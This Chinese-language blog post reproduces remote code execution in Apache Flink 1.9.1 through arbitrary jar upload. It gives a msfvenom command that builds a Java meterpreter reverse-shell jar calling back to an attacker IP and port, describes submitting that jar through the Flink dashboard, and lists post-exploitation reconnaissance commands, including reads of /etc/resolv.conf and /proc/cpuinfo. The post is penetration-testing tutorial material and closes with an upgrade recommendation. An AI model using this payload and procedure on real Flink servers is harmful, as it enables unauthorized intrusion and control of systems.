Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

  • 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切.

漏洞概述:

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。

漏洞版本:

至目前最新版本Apache Flink 1.9.1

漏洞复现:

1.测试环境:Flink 1.9.1 java8+
2. 生成远控制木马
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.224.129 LPORT=8087 -f jar > rce.jar
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第1张图片
3. 将木马传入到Apache Flink里Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第2张图片
4.使用msf攻击模块
在这里插入图片描述
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第3张图片
5.点击提交,执行反弹shell脚本木马
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第4张图片
6.反弹shell
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第5张图片

权限维持—渗透

  1. 信息收集
    获取版本信息 uname -a
    在这里插入图片描述
    CPU信息 cat /proc/cpuinfo
    Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第6张图片
    查看dns配置信息 cat /etc/resolv.conf
    Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第7张图片
    arp表
    Apache Flink 任意 Jar 包上传致 RCE 漏洞复现_第8张图片

漏洞修复:

  • 升级升级升级。

    余生很长,请多指教。
    在这里插入图片描述

你可能感兴趣的:(CVE)